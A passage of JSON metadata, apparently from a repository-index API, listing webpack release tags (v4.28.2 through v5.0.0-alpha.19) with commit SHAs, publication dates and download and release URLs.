.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos